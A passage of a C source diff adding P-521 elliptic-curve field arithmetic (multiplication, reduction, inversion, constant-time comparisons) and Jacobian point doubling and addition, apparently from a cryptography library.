+        ((uint128_t) in1[2]) * in2[1] + ((uint128_t) in1[3]) * in2[0];
+
+    out[4] = ((uint128_t) in1[0]) * in2[4] +
+        ((uint128_t) in1[1]) * in2[3] +
+        ((uint128_t) in1[2]) * in2[2] +
+        ((uint128_t) in1[3]) * in2[1] + ((uint128_t) in1[4]) * in2[0];
+
+    out[5] = ((uint128_t) in1[0]) * in2[5] +
+        ((uint128_t) in1[1]) * in2[4] +
+        ((uint128_t) in1[2]) * in2[3] +
+        ((uint128_t) in1[3]) * in2[2] +
+        ((uint128_t) in1[4]) * in2[1] + ((uint128_t) in1[5]) * in2[0];
+
+    out[6] = ((uint128_t) in1[0]) * in2[6] +
+        ((uint128_t) in1[1]) * in2[5] +
+        ((uint128_t) in1[2]) * in2[4] +
+        ((uint128_t) in1[3]) * in2[3] +
+        ((uint128_t) in1[4]) * in2[2] +
+        ((uint128_t) in1[5]) * in2[1] + ((uint128_t) in1[6]) * in2[0];
+
+    out[7] = ((uint128_t) in1[0]) * in2[7] +
+        ((uint128_t) in1[1]) * in2[6] +
+        ((uint128_t) in1[2]) * in2[5] +
+        ((uint128_t) in1[3]) * in2[4] +
+        ((uint128_t) in1[4]) * in2[3] +
+        ((uint128_t) in1[5]) * in2[2] +
+        ((uint128_t) in1[6]) * in2[1] + ((uint128_t) in1[7]) * in2[0];
+
+    out[8] = ((uint128_t) in1[0]) * in2[8] +
+        ((uint128_t) in1[1]) * in2[7] +
+        ((uint128_t) in1[2]) * in2[6] +
+        ((uint128_t) in1[3]) * in2[5] +
+        ((uint128_t) in1[4]) * in2[4] +
+        ((uint128_t) in1[5]) * in2[3] +
+        ((uint128_t) in1[6]) * in2[2] +
+        ((uint128_t) in1[7]) * in2[1] + ((uint128_t) in1[8]) * in2[0];
+
+    /* See comment in felem_square about the use of in2x2 here */
+
+    out[0] += ((uint128_t) in1[1]) * in2x2[8] +
+        ((uint128_t) in1[2]) * in2x2[7] +
+        ((uint128_t) in1[3]) * in2x2[6] +
+        ((uint128_t) in1[4]) * in2x2[5] +
+        ((uint128_t) in1[5]) * in2x2[4] +
+        ((uint128_t) in1[6]) * in2x2[3] +
+        ((uint128_t) in1[7]) * in2x2[2] + ((uint128_t) in1[8]) * in2x2[1];
+
+    out[1] += ((uint128_t) in1[2]) * in2x2[8] +
+        ((uint128_t) in1[3]) * in2x2[7] +
+        ((uint128_t) in1[4]) * in2x2[6] +
+        ((uint128_t) in1[5]) * in2x2[5] +
+        ((uint128_t) in1[6]) * in2x2[4] +
+        ((uint128_t) in1[7]) * in2x2[3] + ((uint128_t) in1[8]) * in2x2[2];
+
+    out[2] += ((uint128_t) in1[3]) * in2x2[8] +
+        ((uint128_t) in1[4]) * in2x2[7] +
+        ((uint128_t) in1[5]) * in2x2[6] +
+        ((uint128_t) in1[6]) * in2x2[5] +
+        ((uint128_t) in1[7]) * in2x2[4] + ((uint128_t) in1[8]) * in2x2[3];
+
+    out[3] += ((uint128_t) in1[4]) * in2x2[8] +
+        ((uint128_t) in1[5]) * in2x2[7] +
+        ((uint128_t) in1[6]) * in2x2[6] +
+        ((uint128_t) in1[7]) * in2x2[5] + ((uint128_t) in1[8]) * in2x2[4];
+
+    out[4] += ((uint128_t) in1[5]) * in2x2[8] +
+        ((uint128_t) in1[6]) * in2x2[7] +
+        ((uint128_t) in1[7]) * in2x2[6] + ((uint128_t) in1[8]) * in2x2[5];
+
+    out[5] += ((uint128_t) in1[6]) * in2x2[8] +
+        ((uint128_t) in1[7]) * in2x2[7] + ((uint128_t) in1[8]) * in2x2[6];
+
+    out[6] += ((uint128_t) in1[7]) * in2x2[8] +
+        ((uint128_t) in1[8]) * in2x2[7];
+
+    out[7] += ((uint128_t) in1[8]) * in2x2[8];
+}
+
+static const limb bottom52bits = 0xfffffffffffff;
+
+/*-
+ * felem_reduce converts a largefelem to an felem.
+ * On entry:
+ *   in[i] < 2^128
+ * On exit:
+ *   out[i] < 2^59 + 2^14
+ */
+static void felem_reduce(felem out, const largefelem in)
+{
+    u64 overflow1, overflow2;
+
+    out[0] = ((limb) in[0]) & bottom58bits;
+    out[1] = ((limb) in[1]) & bottom58bits;
+    out[2] = ((limb) in[2]) & bottom58bits;
+    out[3] = ((limb) in[3]) & bottom58bits;
+    out[4] = ((limb) in[4]) & bottom58bits;
+    out[5] = ((limb) in[5]) & bottom58bits;
+    out[6] = ((limb) in[6]) & bottom58bits;
+    out[7] = ((limb) in[7]) & bottom58bits;
+    out[8] = ((limb) in[8]) & bottom58bits;
+
+    /* out[i] < 2^58 */
+
+    out[1] += ((limb) in[0]) >> 58;
+    out[1] += (((limb) (in[0] >> 64)) & bottom52bits) << 6;
+    /*-
+     * out[1] < 2^58 + 2^6 + 2^58
+     *        = 2^59 + 2^6
+     */
+    out[2] += ((limb) (in[0] >> 64)) >> 52;
+
+    out[2] += ((limb) in[1]) >> 58;
+    out[2] += (((limb) (in[1] >> 64)) & bottom52bits) << 6;
+    out[3] += ((limb) (in[1] >> 64)) >> 52;
+
+    out[3] += ((limb) in[2]) >> 58;
+    out[3] += (((limb) (in[2] >> 64)) & bottom52bits) << 6;
+    out[4] += ((limb) (in[2] >> 64)) >> 52;
+
+    out[4] += ((limb) in[3]) >> 58;
+    out[4] += (((limb) (in[3] >> 64)) & bottom52bits) << 6;
+    out[5] += ((limb) (in[3] >> 64)) >> 52;
+
+    out[5] += ((limb) in[4]) >> 58;
+    out[5] += (((limb) (in[4] >> 64)) & bottom52bits) << 6;
+    out[6] += ((limb) (in[4] >> 64)) >> 52;
+
+    out[6] += ((limb) in[5]) >> 58;
+    out[6] += (((limb) (in[5] >> 64)) & bottom52bits) << 6;
+    out[7] += ((limb) (in[5] >> 64)) >> 52;
+
+    out[7] += ((limb) in[6]) >> 58;
+    out[7] += (((limb) (in[6] >> 64)) & bottom52bits) << 6;
+    out[8] += ((limb) (in[6] >> 64)) >> 52;
+
+    out[8] += ((limb) in[7]) >> 58;
+    out[8] += (((limb) (in[7] >> 64)) & bottom52bits) << 6;
+    /*-
+     * out[x > 1] < 2^58 + 2^6 + 2^58 + 2^12
+     *            < 2^59 + 2^13
+     */
+    overflow1 = ((limb) (in[7] >> 64)) >> 52;
+
+    overflow1 += ((limb) in[8]) >> 58;
+    overflow1 += (((limb) (in[8] >> 64)) & bottom52bits) << 6;
+    overflow2 = ((limb) (in[8] >> 64)) >> 52;
+
+    overflow1 <<= 1;            /* overflow1 < 2^13 + 2^7 + 2^59 */
+    overflow2 <<= 1;            /* overflow2 < 2^13 */
+
+    out[0] += overflow1;        /* out[0] < 2^60 */
+    out[1] += overflow2;        /* out[1] < 2^59 + 2^6 + 2^13 */
+
+    out[1] += out[0] >> 58;
+    out[0] &= bottom58bits;
+    /*-
+     * out[0] < 2^58
+     * out[1] < 2^59 + 2^6 + 2^13 + 2^2
+     *        < 2^59 + 2^14
+     */
+}
+
+static void felem_square_reduce(felem out, const felem in)
+{
+    largefelem tmp;
+    felem_square(tmp, in);
+    felem_reduce(out, tmp);
+}
+
+static void felem_mul_reduce(felem out, const felem in1, const felem in2)
+{
+    largefelem tmp;
+    felem_mul(tmp, in1, in2);
+    felem_reduce(out, tmp);
+}
+
+/*-
+ * felem_inv calculates |out| = |in|^{-1}
+ *
+ * Based on Fermat's Little Theorem:
+ *   a^p = a (mod p)
+ *   a^{p-1} = 1 (mod p)
+ *   a^{p-2} = a^{-1} (mod p)
+ */
+static void felem_inv(felem out, const felem in)
+{
+    felem ftmp, ftmp2, ftmp3, ftmp4;
+    largefelem tmp;
+    unsigned i;
+
+    felem_square(tmp, in);
+    felem_reduce(ftmp, tmp);    /* 2^1 */
+    felem_mul(tmp, in, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^2 - 2^0 */
+    felem_assign(ftmp2, ftmp);
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^3 - 2^1 */
+    felem_mul(tmp, in, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^3 - 2^0 */
+    felem_square(tmp, ftmp);
+    felem_reduce(ftmp, tmp);    /* 2^4 - 2^1 */
+
+    felem_square(tmp, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^3 - 2^1 */
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp3, tmp);   /* 2^4 - 2^2 */
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^4 - 2^0 */
+
+    felem_assign(ftmp2, ftmp3);
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp3, tmp);   /* 2^5 - 2^1 */
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp3, tmp);   /* 2^6 - 2^2 */
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp3, tmp);   /* 2^7 - 2^3 */
+    felem_square(tmp, ftmp3);
+    felem_reduce(ftmp3, tmp);   /* 2^8 - 2^4 */
+    felem_assign(ftmp4, ftmp3);
+    felem_mul(tmp, ftmp3, ftmp);
+    felem_reduce(ftmp4, tmp);   /* 2^8 - 2^1 */
+    felem_square(tmp, ftmp4);
+    felem_reduce(ftmp4, tmp);   /* 2^9 - 2^2 */
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^8 - 2^0 */
+    felem_assign(ftmp2, ftmp3);
+
+    for (i = 0; i < 8; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^16 - 2^8 */
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^16 - 2^0 */
+    felem_assign(ftmp2, ftmp3);
+
+    for (i = 0; i < 16; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^32 - 2^16 */
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^32 - 2^0 */
+    felem_assign(ftmp2, ftmp3);
+
+    for (i = 0; i < 32; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^64 - 2^32 */
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^64 - 2^0 */
+    felem_assign(ftmp2, ftmp3);
+
+    for (i = 0; i < 64; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^128 - 2^64 */
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^128 - 2^0 */
+    felem_assign(ftmp2, ftmp3);
+
+    for (i = 0; i < 128; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^256 - 2^128 */
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^256 - 2^0 */
+    felem_assign(ftmp2, ftmp3);
+
+    for (i = 0; i < 256; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^512 - 2^256 */
+    }
+    felem_mul(tmp, ftmp3, ftmp2);
+    felem_reduce(ftmp3, tmp);   /* 2^512 - 2^0 */
+
+    for (i = 0; i < 9; i++) {
+        felem_square(tmp, ftmp3);
+        felem_reduce(ftmp3, tmp); /* 2^521 - 2^9 */
+    }
+    felem_mul(tmp, ftmp3, ftmp4);
+    felem_reduce(ftmp3, tmp);   /* 2^512 - 2^2 */
+    felem_mul(tmp, ftmp3, in);
+    felem_reduce(out, tmp);     /* 2^512 - 3 */
+}
+
+/* This is 2^521-1, expressed as an felem */
+static const felem kPrime = {
+    0x03ffffffffffffff, 0x03ffffffffffffff, 0x03ffffffffffffff,
+    0x03ffffffffffffff, 0x03ffffffffffffff, 0x03ffffffffffffff,
+    0x03ffffffffffffff, 0x03ffffffffffffff, 0x01ffffffffffffff
+};
+
+/*-
+ * felem_is_zero returns a limb with all bits set if |in| == 0 (mod p) and 0
+ * otherwise.
+ * On entry:
+ *   in[i] < 2^59 + 2^14
+ */
+static limb felem_is_zero(const felem in)
+{
+    felem ftmp;
+    limb is_zero, is_p;
+    felem_assign(ftmp, in);
+
+    ftmp[0] += ftmp[8] >> 57;
+    ftmp[8] &= bottom57bits;
+    /* ftmp[8] < 2^57 */
+    ftmp[1] += ftmp[0] >> 58;
+    ftmp[0] &= bottom58bits;
+    ftmp[2] += ftmp[1] >> 58;
+    ftmp[1] &= bottom58bits;
+    ftmp[3] += ftmp[2] >> 58;
+    ftmp[2] &= bottom58bits;
+    ftmp[4] += ftmp[3] >> 58;
+    ftmp[3] &= bottom58bits;
+    ftmp[5] += ftmp[4] >> 58;
+    ftmp[4] &= bottom58bits;
+    ftmp[6] += ftmp[5] >> 58;
+    ftmp[5] &= bottom58bits;
+    ftmp[7] += ftmp[6] >> 58;
+    ftmp[6] &= bottom58bits;
+    ftmp[8] += ftmp[7] >> 58;
+    ftmp[7] &= bottom58bits;
+    /* ftmp[8] < 2^57 + 4 */
+
+    /*
+     * The ninth limb of 2*(2^521-1) is 0x03ffffffffffffff, which is greater
+     * than our bound for ftmp[8]. Therefore we only have to check if the
+     * zero is zero or 2^521-1.
+     */
+
+    is_zero = 0;
+    is_zero |= ftmp[0];
+    is_zero |= ftmp[1];
+    is_zero |= ftmp[2];
+    is_zero |= ftmp[3];
+    is_zero |= ftmp[4];
+    is_zero |= ftmp[5];
+    is_zero |= ftmp[6];
+    is_zero |= ftmp[7];
+    is_zero |= ftmp[8];
+
+    is_zero--;
+    /*
+     * We know that ftmp[i] < 2^63, therefore the only way that the top bit
+     * can be set is if is_zero was 0 before the decrement.
+     */
+    is_zero = ((s64) is_zero) >> 63;
+
+    is_p = ftmp[0] ^ kPrime[0];
+    is_p |= ftmp[1] ^ kPrime[1];
+    is_p |= ftmp[2] ^ kPrime[2];
+    is_p |= ftmp[3] ^ kPrime[3];
+    is_p |= ftmp[4] ^ kPrime[4];
+    is_p |= ftmp[5] ^ kPrime[5];
+    is_p |= ftmp[6] ^ kPrime[6];
+    is_p |= ftmp[7] ^ kPrime[7];
+    is_p |= ftmp[8] ^ kPrime[8];
+
+    is_p--;
+    is_p = ((s64) is_p) >> 63;
+
+    is_zero |= is_p;
+    return is_zero;
+}
+
+static int felem_is_zero_int(const felem in)
+{
+    return (int)(felem_is_zero(in) & ((limb) 1));
+}
+
+/*-
+ * felem_contract converts |in| to its unique, minimal representation.
+ * On entry:
+ *   in[i] < 2^59 + 2^14
+ */
+static void felem_contract(felem out, const felem in)
+{
+    limb is_p, is_greater, sign;
+    static const limb two58 = ((limb) 1) << 58;
+
+    felem_assign(out, in);
+
+    out[0] += out[8] >> 57;
+    out[8] &= bottom57bits;
+    /* out[8] < 2^57 */
+    out[1] += out[0] >> 58;
+    out[0] &= bottom58bits;
+    out[2] += out[1] >> 58;
+    out[1] &= bottom58bits;
+    out[3] += out[2] >> 58;
+    out[2] &= bottom58bits;
+    out[4] += out[3] >> 58;
+    out[3] &= bottom58bits;
+    out[5] += out[4] >> 58;
+    out[4] &= bottom58bits;
+    out[6] += out[5] >> 58;
+    out[5] &= bottom58bits;
+    out[7] += out[6] >> 58;
+    out[6] &= bottom58bits;
+    out[8] += out[7] >> 58;
+    out[7] &= bottom58bits;
+    /* out[8] < 2^57 + 4 */
+
+    /*
+     * If the value is greater than 2^521-1 then we have to subtract 2^521-1
+     * out. See the comments in felem_is_zero regarding why we don't test for
+     * other multiples of the prime.
+     */
+
+    /*
+     * First, if |out| is equal to 2^521-1, we subtract it out to get zero.
+     */
+
+    is_p = out[0] ^ kPrime[0];
+    is_p |= out[1] ^ kPrime[1];
+    is_p |= out[2] ^ kPrime[2];
+    is_p |= out[3] ^ kPrime[3];
+    is_p |= out[4] ^ kPrime[4];
+    is_p |= out[5] ^ kPrime[5];
+    is_p |= out[6] ^ kPrime[6];
+    is_p |= out[7] ^ kPrime[7];
+    is_p |= out[8] ^ kPrime[8];
+
+    is_p--;
+    is_p &= is_p << 32;
+    is_p &= is_p << 16;
+    is_p &= is_p << 8;
+    is_p &= is_p << 4;
+    is_p &= is_p << 2;
+    is_p &= is_p << 1;
+    is_p = ((s64) is_p) >> 63;
+    is_p = ~is_p;
+
+    /* is_p is 0 iff |out| == 2^521-1 and all ones otherwise */
+
+    out[0] &= is_p;
+    out[1] &= is_p;
+    out[2] &= is_p;
+    out[3] &= is_p;
+    out[4] &= is_p;
+    out[5] &= is_p;
+    out[6] &= is_p;
+    out[7] &= is_p;
+    out[8] &= is_p;
+
+    /*
+     * In order to test that |out| >= 2^521-1 we need only test if out[8] >>
+     * 57 is greater than zero as (2^521-1) + x >= 2^522
+     */
+    is_greater = out[8] >> 57;
+    is_greater |= is_greater << 32;
+    is_greater |= is_greater << 16;
+    is_greater |= is_greater << 8;
+    is_greater |= is_greater << 4;
+    is_greater |= is_greater << 2;
+    is_greater |= is_greater << 1;
+    is_greater = ((s64) is_greater) >> 63;
+
+    out[0] -= kPrime[0] & is_greater;
+    out[1] -= kPrime[1] & is_greater;
+    out[2] -= kPrime[2] & is_greater;
+    out[3] -= kPrime[3] & is_greater;
+    out[4] -= kPrime[4] & is_greater;
+    out[5] -= kPrime[5] & is_greater;
+    out[6] -= kPrime[6] & is_greater;
+    out[7] -= kPrime[7] & is_greater;
+    out[8] -= kPrime[8] & is_greater;
+
+    /* Eliminate negative coefficients */
+    sign = -(out[0] >> 63);
+    out[0] += (two58 & sign);
+    out[1] -= (1 & sign);
+    sign = -(out[1] >> 63);
+    out[1] += (two58 & sign);
+    out[2] -= (1 & sign);
+    sign = -(out[2] >> 63);
+    out[2] += (two58 & sign);
+    out[3] -= (1 & sign);
+    sign = -(out[3] >> 63);
+    out[3] += (two58 & sign);
+    out[4] -= (1 & sign);
+    sign = -(out[4] >> 63);
+    out[4] += (two58 & sign);
+    out[5] -= (1 & sign);
+    sign = -(out[0] >> 63);
+    out[5] += (two58 & sign);
+    out[6] -= (1 & sign);
+    sign = -(out[6] >> 63);
+    out[6] += (two58 & sign);
+    out[7] -= (1 & sign);
+    sign = -(out[7] >> 63);
+    out[7] += (two58 & sign);
+    out[8] -= (1 & sign);
+    sign = -(out[5] >> 63);
+    out[5] += (two58 & sign);
+    out[6] -= (1 & sign);
+    sign = -(out[6] >> 63);
+    out[6] += (two58 & sign);
+    out[7] -= (1 & sign);
+    sign = -(out[7] >> 63);
+    out[7] += (two58 & sign);
+    out[8] -= (1 & sign);
+}
+
+/*-
+ * Group operations
+ * ----------------
+ *
+ * Building on top of the field operations we have the operations on the
+ * elliptic curve group itself. Points on the curve are represented in Jacobian
+ * coordinates */
+
+/*-
+ * point_double calcuates 2*(x_in, y_in, z_in)
+ *
+ * The method is taken from:
+ *   http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-3.html#doubling-dbl-2001-b
+ *
+ * Outputs can equal corresponding inputs, i.e., x_out == x_in is allowed.
+ * while x_out == y_in is not (maybe this works, but it's not tested). */
+static void
+point_double(felem x_out, felem y_out, felem z_out,
+             const felem x_in, const felem y_in, const felem z_in)
+{
+    largefelem tmp, tmp2;
+    felem delta, gamma, beta, alpha, ftmp, ftmp2;
+
+    felem_assign(ftmp, x_in);
+    felem_assign(ftmp2, x_in);
+
+    /* delta = z^2 */
+    felem_square(tmp, z_in);
+    felem_reduce(delta, tmp);   /* delta[i] < 2^59 + 2^14 */
+
+    /* gamma = y^2 */
+    felem_square(tmp, y_in);
+    felem_reduce(gamma, tmp);   /* gamma[i] < 2^59 + 2^14 */
+
+    /* beta = x*gamma */
+    felem_mul(tmp, x_in, gamma);
+    felem_reduce(beta, tmp);    /* beta[i] < 2^59 + 2^14 */
+
+    /* alpha = 3*(x-delta)*(x+delta) */
+    felem_diff64(ftmp, delta);
+    /* ftmp[i] < 2^61 */
+    felem_sum64(ftmp2, delta);
+    /* ftmp2[i] < 2^60 + 2^15 */
+    felem_scalar64(ftmp2, 3);
+    /* ftmp2[i] < 3*2^60 + 3*2^15 */
+    felem_mul(tmp, ftmp, ftmp2);
+    /*-
+     * tmp[i] < 17(3*2^121 + 3*2^76)
+     *        = 61*2^121 + 61*2^76
+     *        < 64*2^121 + 64*2^76
+     *        = 2^127 + 2^82
+     *        < 2^128
+     */
+    felem_reduce(alpha, tmp);
+
+    /* x' = alpha^2 - 8*beta */
+    felem_square(tmp, alpha);
+    /*
+     * tmp[i] < 17*2^120 < 2^125
+     */
+    felem_assign(ftmp, beta);
+    felem_scalar64(ftmp, 8);
+    /* ftmp[i] < 2^62 + 2^17 */
+    felem_diff_128_64(tmp, ftmp);
+    /* tmp[i] < 2^125 + 2^63 + 2^62 + 2^17 */
+    felem_reduce(x_out, tmp);
+
+    /* z' = (y + z)^2 - gamma - delta */
+    felem_sum64(delta, gamma);
+    /* delta[i] < 2^60 + 2^15 */
+    felem_assign(ftmp, y_in);
+    felem_sum64(ftmp, z_in);
+    /* ftmp[i] < 2^60 + 2^15 */
+    felem_square(tmp, ftmp);
+    /*
+     * tmp[i] < 17(2^122) < 2^127
+     */
+    felem_diff_128_64(tmp, delta);
+    /* tmp[i] < 2^127 + 2^63 */
+    felem_reduce(z_out, tmp);
+
+    /* y' = alpha*(4*beta - x') - 8*gamma^2 */
+    felem_scalar64(beta, 4);
+    /* beta[i] < 2^61 + 2^16 */
+    felem_diff64(beta, x_out);
+    /* beta[i] < 2^61 + 2^60 + 2^16 */
+    felem_mul(tmp, alpha, beta);
+    /*-
+     * tmp[i] < 17*((2^59 + 2^14)(2^61 + 2^60 + 2^16))
+     *        = 17*(2^120 + 2^75 + 2^119 + 2^74 + 2^75 + 2^30)
+     *        = 17*(2^120 + 2^119 + 2^76 + 2^74 + 2^30)
+     *        < 2^128
+     */
+    felem_square(tmp2, gamma);
+    /*-
+     * tmp2[i] < 17*(2^59 + 2^14)^2
+     *         = 17*(2^118 + 2^74 + 2^28)
+     */
+    felem_scalar128(tmp2, 8);
+    /*-
+     * tmp2[i] < 8*17*(2^118 + 2^74 + 2^28)
+     *         = 2^125 + 2^121 + 2^81 + 2^77 + 2^35 + 2^31
+     *         < 2^126
+     */
+    felem_diff128(tmp, tmp2);
+    /*-
+     * tmp[i] < 2^127 - 2^69 + 17(2^120 + 2^119 + 2^76 + 2^74 + 2^30)
+     *        = 2^127 + 2^124 + 2^122 + 2^120 + 2^118 + 2^80 + 2^78 + 2^76 +
+     *          2^74 + 2^69 + 2^34 + 2^30
+     *        < 2^128
+     */
+    felem_reduce(y_out, tmp);
+}
+
+/* copy_conditional copies in to out iff mask is all ones. */
+static void copy_conditional(felem out, const felem in, limb mask)
+{
+    unsigned i;
+    for (i = 0; i < NLIMBS; ++i) {
+        const limb tmp = mask & (in[i] ^ out[i]);
+        out[i] ^= tmp;
+    }
+}
+
+/*-
+ * point_add calcuates (x1, y1, z1) + (x2, y2, z2)
+ *
+ * The method is taken from
+ *   http://hyperelliptic.org/EFD/g1p/auto-shortw-jacobian-3.html#addition-add-2007-bl,
+ * adapted for mixed addition (z2 = 1, or z2 = 0 for the point at infinity).
+ *
+ * This function includes a branch for checking whether the two input points
+ * are equal (while not equal to the point at infinity). This case never
+ * happens during single point multiplication, so there is no timing leak for
+ * ECDH or ECDSA signing. */
+static void point_add(felem x3, felem y3, felem z3,
+                      const felem x1, const felem y1, const felem z1,
+                      const int mixed, const felem x2, const felem y2,
+                      const felem z2)
+{
+    felem ftmp, ftmp2, ftmp3, ftmp4, ftmp5, ftmp6, x_out, y_out, z_out;
+    largefelem tmp, tmp2;
+    limb x_equal, y_equal, z1_is_zero, z2_is_zero;
+
+    z1_is_zero = felem_is_zero(z1);
+    z2_is_zero = felem_is_zero(z2);
+
+    /* ftmp = z1z1 = z1**2 */
+    felem_square(tmp, z1);
+    felem_reduce(ftmp, tmp);
+
+    if (!mixed) {
+        /* ftmp2 = z2z2 = z2**2 */
+        felem_square(tmp, z2);
+        felem_reduce(ftmp2, tmp);
+
+        /* u1 = ftmp3 = x1*z2z2 */
+        felem_mul(tmp, x1, ftmp2);
+        felem_reduce(ftmp3, tmp);
+
+        /* ftmp5 = z1 + z2 */
+        felem_assign(ftmp5, z1);
+        felem_sum64(ftmp5, z2);
+        /* ftmp5[i] < 2^61 */
+
+        /* ftmp5 = (z1 + z2)**2 - z1z1 - z2z2 = 2*z1z2 */
+        felem_square(tmp, ftmp5);
+        /* tmp[i] < 17*2^122 */
+        felem_diff_128_64(tmp, ftmp);
+        /* tmp[i] < 17*2^122 + 2^63 */
+        felem_diff_128_64(tmp, ftmp2);
+        /* tmp[i] < 17*2^122 + 2^64 */
+        felem_reduce(ftmp5, tmp);
+
+        /* ftmp2 = z2 * z2z2 */
+        felem_mul(tmp, ftmp2, z2);
+        felem_reduce(ftmp2, tmp);
+
+        /* s1 = ftmp6 = y1 * z2**3 */
+        felem_mul(tmp, y1, ftmp2);
+        felem_reduce(ftmp6, tmp);
+    } else {
+        /*
+         * We'll assume z2 = 1 (special case z2 = 0 is handled later)
+         */
+
+        /* u1 = ftmp3 = x1*z2z2 */
+        felem_assign(ftmp3, x1);
+
+        /* ftmp5 = 2*z1z2 */
+        felem_scalar(ftmp5, z1, 2);
+
+        /* s1 = ftmp6 = y1 * z2**3 */
+        felem_assign(ftmp6, y1);
+    }
+
+    /* u2 = x2*z1z1 */
+    felem_mul(tmp, x2, ftmp);
+    /* tmp[i] < 17*2^120 */
+
+    /* h = ftmp4 = u2 - u1 */
+    felem_diff_128_64(tmp, ftmp3);
+    /* tmp[i] < 17*2^120 + 2^63 */
+    felem_reduce(ftmp4, tmp);
+
+    x_equal = felem_is_zero(ftmp4);
+
+    /* z_out = ftmp5 * h */
+    felem_mul(tmp, ftmp5, ftmp4);
+    felem_reduce(z_out, tmp);
+
+    /* ftmp = z1 * z1z1 */
+    felem_mul(tmp, ftmp, z1);
+    felem_reduce(ftmp, tmp);
+
+    /* s2 = tmp = y2 * z1**3 */
+    felem_mul(tmp, y2, ftmp);
+    /* tmp[i] < 17*2^120 */
+
+    /* r = ftmp5 = (s2 - s1)*2 */
+    felem_diff_128_64(tmp, ftmp6);
+    /* tmp[i] < 17*2^120 + 2^63 */
+    felem_reduce(ftmp5, tmp);
+    y_equal = felem_is_zero(ftmp5);
+    felem_scalar64(ftmp5, 2);
+    /* ftmp5[i] < 2^61 */
+
+    if (x_equal && y_equal && !z1_is_zero && !z2_is_zero) {
+        point_double(x3, y3, z3, x1, y1, z1);
+        return;
+    }
+
+    /* I = ftmp = (2h)**2 */
+    felem_assign(ftmp, ftmp4);
+    felem_scalar64(ftmp, 2);
+    /* ftmp[i] < 2^61 */
+    felem_square(tmp, ftmp);
+    /* tmp[i] < 17*2^122 */
+    felem_reduce(ftmp, tmp);
+
+    /* J = ftmp2 = h * I */
+    felem_mul(tmp, ftmp4, ftmp);
+    felem_reduce(ftmp2, tmp);
+
+    /* V = ftmp4 = U1 * I */
+    felem_mul(tmp, ftmp3, ftmp);
+    felem_reduce(ftmp4, tmp);
+
+    /* x_out = r**2 - J - 2V */
+    felem_square(tmp, ftmp5);
+    /* tmp[i] < 17*2^122 */
+    felem_diff_128_64(tmp, ftmp2);
+    /* tmp[i] < 17*2^122 + 2^63 */
+    felem_assign(ftmp3, ftmp4);
+    felem_scalar64(ftmp4, 2);
+    /* ftmp4[i] < 2^61 */
+    felem_diff_128_64(tmp, ftmp4);
+    /* tmp[i] < 17*2^122 + 2^64 */
+    felem_reduce(x_out, tmp);
+
+    /* y_out = r(V-x_out) - 2 * s1 * J */
+    felem_diff64(ftmp3, x_out);
+    /*
+     * ftmp3[i] < 2^60 + 2^60 = 2^61
+     */
+    felem_mul(tmp, ftmp5, ftmp3);
+    /* tmp[i] < 17*2^122 */
+    felem_mul(tmp2, ftmp6, ftmp2);
+    /* tmp2[i] < 17*2^120 */
+    felem_scalar128(tmp2, 2);
+    /* tmp2[i] < 17*2^121 */
+    felem_diff128(tmp, tmp2);
+        /*-
+         * tmp[i] < 2^127 - 2^69 + 17*2^122
+         *        = 2^126 - 2^122 - 2^6 - 2^2 - 1
+         *        < 2^127
+         */
+    felem_reduce(y_out, tmp);
+
+    copy_conditional(x_out, x2, z1_is_zero);
+    copy_conditional(x_out, x1, z2_is_zero);
+    copy_conditional(y_out, y2, z1_is_zero);
+    copy_conditional(y_out, y1, z2_is_zero);
+    copy_conditional(z_out, z2, z1_is_zero);
+    copy_conditional(z_out, z1, z2_is_zero);
+    felem_assign(x3, x_out);
+    felem_assign(y3, y_out);
+    felem_assign(z3, z_out);
+}
+
+/*-
+ * Base point pre computation
+ * --------------------------
+ *
+ * Two different sorts of precomputed tables are used in the following code.
+ * Each contain various points on the curve, where each point is three field
+ * elements (x, y, z).
+ *
+ * For the base point table, z is usually 1 (0 for the point at infinity).
+ * This table has 16 elements:
+ * index | bits    | point
+ * ------+---------+------------------------------
+ *     0 | 0 0 0 0 | 0G
+ *     1 | 0 0 0 1 | 1G
+ *     2 | 0 0 1 0 | 2^130G
+ *     3 | 0 0 1 1 | (2^130 + 1)G
+ *     4 | 0 1 0 0 | 2^260G
+ *     5 | 0 1 0 1 | (2^260 + 1)G
+ *     6 | 0 1 1 0 | (2^260 + 2^130)G
+ *     7 | 0 1 1 1 | (2^260 + 2^130 + 1)G
+ *     8 | 1 0 0 0 | 2^390G
+ *     9 | 1 0 0 1 | (2^390 + 1)G
+ *    10 | 1 0 1 0 | (2^390 + 2^130)G
+ *    11 | 1 0 1 1 | (2^390 + 2^130 + 1)G
+ *    12 | 1 1 0 0 | (2^390 + 2^260)G
+ *    13 | 1 1 0 1 | (2^390 + 2^260 + 1)G
+ *    14 | 1 1 1 0 | (2^390 + 2^260 + 2^130)G
+ *    15 | 1 1 1 1 | (2^390 + 2^260 + 2^130 + 1)G
+ *
